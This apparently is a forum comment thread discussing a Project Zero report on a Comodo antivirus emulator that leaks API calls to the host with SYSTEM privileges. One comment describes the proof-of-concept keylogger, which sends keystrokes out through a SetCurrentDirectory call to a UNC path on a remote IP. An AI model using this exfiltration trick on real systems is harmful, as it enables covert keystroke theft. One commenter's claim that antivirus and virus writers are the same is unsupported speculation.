Google's Project-Zero https://en.wikipedia.org/wiki/Project_Zero_(Google) is absolutely excellent! Google task top-notch engineers to find zero-day bugs in other company's products, making us all safer.

Very big kudos to Google! The flood of bugs they keep finding and getting other companies to fix is fantastic!

When it comes to security research, Tavis Ormandy is truly inspirational. It isn't just about the bugs he discovers, but I find his explanations often very simple to understand.

This is an extremely severe design issue, where an Anti Virus can not only be bypassed, but it can actually be used to compromise an attacked system. Comodo runs suspicious code inside an emulator(VM), but instead of implementing full OS emulation, they allow a lot of the API calls inside the emulator to leak out to the hosting computer, and actually run them with NT AUTHORITY\SYSTEM privileges(The windows equivalent of root).

The exploit code serves as a simple key logger, by repeatedly calling GetKeyState(With system privileges!), and leaking this information to a remote server using the SetCurrentDirectory() API (By calling SetCurrentDirectory("\\\\?\\UNC\\192.168.237.1\\<Pressed key>")

This is a beautiful attack, and I couldn't help but smirk at the "wtf!!!!" comment.

Some previous Comodo issues:

Comodo ships Adware Privdog worse than Superfish

https://news.ycombinator.com/item?id=9091917

Comodo “Chromodo” Browser disables same origin policy

https://news.ycombinator.com/item?id=11021633

Comodo Internet Security installs and starts a VNC server by default

https://news.ycombinator.com/item?id=11129170

Actually, we find two issues here:

1) that this huge attack surface existed in the first place. (almost by design)

2) how they "fixed" it. (not questioning their design at all)

The whole bugreport reads like an invitation to find more creative combinations of API calls that their filter forwards to the system. From the first comment:

> They're planning to fix those two issues and review all the remaining API's for missing parameter filtering, but wanted to know if I agree that their design is sound. I said I suppose they're correct in theory, but this is a lot of attack surface [...]

My first thought is: so now I am relying on a company that basicly provides me free services for security audits of other companies, some of which I pay for the services they deliver. (Last one is a stretch.) Of course, I rely on many free things, but it's the second order aspect here that troubles me.

Is there an indication of the complexity of the bugs they are finding? Are they among those that should be caught be QA?

Looking at this issue and the the issues linked in its last comment...

Why are they running things like unpackers and emulators as "NT AUTHORITY\SYSTEM", instead of farming them to less privileged processes?

Never trusted the sandbox functionality. I've been installing Comodo CIS with only the firewall and antivirus, sandboxing disabled, HIPS on low settings on. Any notable exploits left that would bypass that?

"used to forward", from what I understand this has been fixed.

My god what a mess. I think virus writers and hackers should specifically target anti virus suites, given how much of a security risk these pose to the user. Heh, I guess they do just that. I wouldn't be surprised if some of the virus and anti-virus writers are one and the same people or organizations. Because it makes a lot of sense - open the door to intruders and then tell users it's their fault, then manipulate them into buying your security product. Rinse and repeat and make millions.

Does anyone have any good experiences with any anti-virus software?